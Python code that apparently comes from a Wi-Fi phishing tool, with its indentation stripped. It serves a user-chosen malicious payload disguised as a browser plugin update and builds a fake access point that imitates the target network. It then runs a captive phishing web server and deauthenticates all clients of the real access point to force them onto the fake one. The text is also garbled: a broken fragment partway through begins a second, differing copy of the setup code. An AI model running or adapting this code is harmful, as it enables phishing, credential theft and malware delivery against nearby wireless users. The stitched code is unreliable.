template = tui_template_obj.gather_info(args.phishingscenario,
self.template_manager)
print("[" + G + "+" + W + "] Selecting " +
template.get_display_name() + " template")
# payload selection for browser plugin update
if template.has_payload():
payload_path = False
# copy payload to update directory
while not payload_path or not os.path.isfile(payload_path):
# get payload path
payload_path = raw_input(
"[" + G + "+" + W + "] Enter the [" + G + "full path" + W +
"] to the payload you wish to serve: ")
if not os.path.isfile(payload_path):
print '[' + R + '-' + W + '] Invalid file path!'
print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
copyfile(payload_path,
PHISHING_PAGES_DIR + template.get_payload_path())
APs_context = []
for i in APs:
APs_context.append({
'channel':
APs[i][0] or "",
'essid':
APs[i][1] or "",
'bssid':
APs[i][2] or "",
'vendor':
self.mac_matcher.get_vendor_name(APs[i][2]) or ""
})
template.merge_context({'APs': APs_context})
# only get logo path if MAC address is present
ap_logo_path = False
if ap_mac:
ap_logo_path = template.use_file(
self.mac_matcher.get_vendor_logo_path(ap_mac))
template.merge_context({
'target_ap_channel':
channel or "",
'target_ap_essid':
essid or "",
'target_ap_bssid':
ap_mac or "",
'target_ap_encryption':
enctype or "",
'target_ap_vendor':
self.mac_matcher.get_vendor_name(ap_mac) or "",
'target_ap_logo_path':
ap_logo_path or ""
})
# We want to set this now for hostapd. Maybe the interface was in "monitor"
# mode for network discovery before (e.g. when --nojamming is enabled).
self.network_manager.set_interface_mode(ap_iface, "managed")
# Start AP
self.access_point.set_interface(ap_iface)
self.access_point.set_channel(channel)
self.access_point.set_essid(essid)
if args.presharedkey:
self.access_point.set_psk(args.presharedkey)
if args.internetinterface:
self.access_point.set_internet_interface(args.internetinterface)
print '[' + T + '*' + W + '] Starting the fake access point...'
try:
self.access_point.start()
self.access_point.start_dhcp_dns()
except:
self.stop()
# With configured DHCP, we may now start the web server
if not args.internetinterface:
# Start HTTP server in a background thread
print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str(
PORT) + ", " + str(SSL_PORT)
webserver = Thread(target=phishinghttp.runHTTPServer,
args=(NETWORK_GW_IP, PORT, SSL_PORT, template))
webserver.daemon = True
webserver.start()
time.sleep(1.5)
# We no longer need mac_matcher
self.mac_matcher.unbind()
clients_APs = []
APs = []
deauthentication = None
if not args.nojamming:
# set the channel on the deauthenticating interface
self.network_manager.set_interface_channel(mon_iface, int(channel))
# start deauthenticating all client on target access point
deauthentication = deauth.Deauthentication(ap_mac, mon_iface)
if args.lure10_exploit:
deauthentication.add_lure10_beacons(LOCS_DIR +
args.lure10_exploit)
deauthentication.deauthenticate()
# Main loop.
try:
main_info = tui.MainInfo(VERSION, essid, channel, ap_iface,
deauthentication, phishinghttp, args)
tui_main_object = tui.TuiMain()
curses.wrapper(tui_main_object.gather_info, main_info)
except KeyboardInterrupt:
if deauthentication != None:
deauthentication.on_exit()
self.stop()
self.network_manager, args)
ap_sel_object = tui.TuiApSel()
access_point = curses.wrapper(ap_sel_object.gather_info,
ap_info_object)
# if the user has chosen a access point continue
# otherwise shutdown
if access_point:
# store choosen access point's information
essid = access_point.name
channel = access_point.channel
target_ap_mac = access_point.mac_address
enctype = access_point.encryption
else:
self.stop()
# create a template manager object
self.template_manager = phishingpage.TemplateManager(data_pages=args.phishing_pages_directory)
# get the correct template
tui_template_obj = tui.TuiTemplateSelection()
template = tui_template_obj.gather_info(args.phishingscenario,
self.template_manager)
logger.info("Selecting {} template".format(
template.get_display_name()))
print("[" + G + "+" + W + "] Selecting " +
template.get_display_name() + " template")
# payload selection for browser plugin update
if template.has_payload():
payload_path = args.payload_path
# copy payload to update directory
while not payload_path or not os.path.isfile(payload_path):
# get payload path
